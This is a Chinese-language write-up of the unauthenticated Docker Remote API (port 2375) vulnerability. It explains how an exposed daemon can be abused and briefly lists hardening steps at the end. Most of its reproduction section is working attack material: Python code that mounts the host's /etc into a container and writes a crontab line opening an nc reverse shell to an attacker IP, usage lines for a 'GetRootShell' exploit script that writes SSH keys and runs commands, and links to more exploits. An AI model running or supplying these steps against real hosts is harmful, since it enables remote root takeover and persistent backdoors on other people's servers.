Docker 未授权访问

一、漏洞简介

1. 基础介绍

http://www.loner.fm/drops/##!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8

docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,由docker官方提供,具体的大家可以看官网介绍。

漏洞发现的起因是,有一位同学在使用docker swarm的时候,发现了管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,然后他研究了下,发现这是 Docker Remote API,可以执行docker命令,比如访问 http://host:2375/containers/json 会返回服务器当前运行的 container列表,和在docker CLI上执行 docker ps 的效果一样,其他操作比如创建/删除container,拉取image等操作也都可以通过API调用完成,然后他就开始吐槽了,这尼玛太不安全了。

然后我想了想 swarm是用来管理docker集群的,应该放在内网才对。问了之后发现,他是在公网上的几台机器上安装swarm的,并且2375端口的访问策略是开放的,所以可以直接访问。

2. 测试环境配置

先关闭docker,然后开启:

sudo service docker stop
# 绑定Docker Remote Api在指定端口(这里是2375),可以自行测试。
sudo docker daemon  -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

参考API规范进行渗透:https://docs.docker.com/engine/reference/api/docker-remote-api-v1.23/

操作Docker API可以使用python dockert api 完成。

pip install docker-py

API使用参考:https://docker-py.readthedocs.io/en/stable/api/##client-api

二、影响范围

三、复现过程

利用方法是,我们随意启动一个容器,并将宿主机的/etc目录挂载到容器中,便可以任意读写文件了。我们可以将命令写入crontab配置文件,进行反弹shell。

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 21 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

写入crontab文件,成功反弹shell:

python脚本

https://github.com/ianxtianxt/docker_api_vul

  • 安装类库 pip install -r requirements.txt

  • 查看运行的容器 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375

  • 查看所有的容器 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -a

  • 查看所有镜像 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -l

  • 查看端口映射 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -L

  • 写计划任务(centos,redhat等,加-u参数用于ubuntu等) python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -C -i 镜像名 -H 反弹ip -P 反弹端口 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -C -u -i 镜像名 -H 反弹ip -P 反弹端口

  • 写sshkey(自行修改脚本的中公钥) python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -C -i 镜像名 -k

  • 在容器中执行命令 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -e "id" -I 容器id

  • 删除容器 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -c -I 容器id

  • 修改client api版本 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -v 1.22

  • 查看服务端api版本 python dockerRemoteApiGetRootShell.py -h 127.0.0.1 -p 2375 -V

3.3 其他的一些exp

https://github.com/netxfly/docker-remote-api-exphttps://github.com/zer0yu/SomePoC/blob/master/Docker/Docker_Remote_API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.pyhttps://github.com/JnuSimba/MiscSecNotes/tree/master/Docker%E5%AE%89%E5%85%A8

4. 防护策略

  • 1.修改 Docker Remote API 服务默认参数。注意:该操作需要重启 Docker 服务才能生效。

  • 2.修改 Docker 的启动参数: 定位到 DOCKER_OPTS 中的 tcp://0.0.0.0:2375,将0.0.0.0修改为127.0.0.1 或将默认端口 2375 改为自定义端口 为 Remote API 设置认证措施。参照 官方文档 配置 Rem

  • 3.注意:该操作需要重启 Docker 服务才能生效。 修改 Docker 服务运行账号。请以较低权限账号运行 Docker 服务;另外,可以限制攻击者执行高危命令。

  • 4.注意:该操作需要重启 Docker 服务才能生效。 设置防火墙策略。如果正常业务中 API 服务需要被其他服务器来访问,可以配置安全组策略或 iptables 策略,仅允许指定的 IP 来访问 Docker 接口。